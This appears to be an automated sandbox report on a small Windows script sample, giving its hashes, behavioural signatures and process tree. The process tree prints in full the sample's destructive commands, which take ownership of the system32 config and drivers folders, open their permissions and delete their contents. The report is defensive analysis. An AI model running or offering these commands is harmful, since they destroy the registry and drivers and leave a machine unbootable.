Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:31
Static task
static1
Behavioral task
behavioral1
Sample
file.wsf
Resource
win7-20240708-en
General
-
Target
file.wsf
-
Size
2KB
-
MD5
b39eb8682deec9c7a7edcb64512655b0
-
SHA1
d412384d9cfd8ec2333146eb1dd6c137543dabc7
-
SHA256
9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
-
SHA512
539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2656 takeown.exe 2672 takeown.exe 2728 icacls.exe 2232 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2656 takeown.exe 2672 takeown.exe 2728 icacls.exe 2232 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
Notepad.exepid process 2868 Notepad.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2672 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 1664 wrote to memory of 568 1664 cmd.exe WScript.exe PID 1664 wrote to memory of 568 1664 cmd.exe WScript.exe PID 1664 wrote to memory of 568 1664 cmd.exe WScript.exe PID 568 wrote to memory of 2760 568 WScript.exe cmd.exe PID 568 wrote to memory of 2760 568 WScript.exe cmd.exe PID 568 wrote to memory of 2760 568 WScript.exe cmd.exe PID 568 wrote to memory of 2984 568 WScript.exe cmd.exe PID 568 wrote to memory of 2984 568 WScript.exe cmd.exe PID 568 wrote to memory of 2984 568 WScript.exe cmd.exe PID 2760 wrote to memory of 2656 2760 cmd.exe takeown.exe PID 2760 wrote to memory of 2656 2760 cmd.exe takeown.exe PID 2760 wrote to memory of 2656 2760 cmd.exe takeown.exe PID 2984 wrote to memory of 2672 2984 cmd.exe takeown.exe PID 2984 wrote to memory of 2672 2984 cmd.exe takeown.exe PID 2984 wrote to memory of 2672 2984 cmd.exe takeown.exe PID 2760 wrote to memory of 2728 2760 cmd.exe icacls.exe PID 2760 wrote to memory of 2728 2760 cmd.exe icacls.exe PID 2760 wrote to memory of 2728 2760 cmd.exe icacls.exe PID 2984 wrote to memory of 2232 2984 cmd.exe icacls.exe PID 2984 wrote to memory of 2232 2984 cmd.exe icacls.exe PID 2984 wrote to memory of 2232 2984 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2656
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2232
-
-
-
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnprotectAssert.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2868
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b39eb8682deec9c7a7edcb64512655b0
SHA1d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA2569f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
-
Filesize
98B
MD54b91264568ac2162700be36338c095e8
SHA1c95726edf8303e6adabcb12ffdca90b51349990a
SHA2562c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b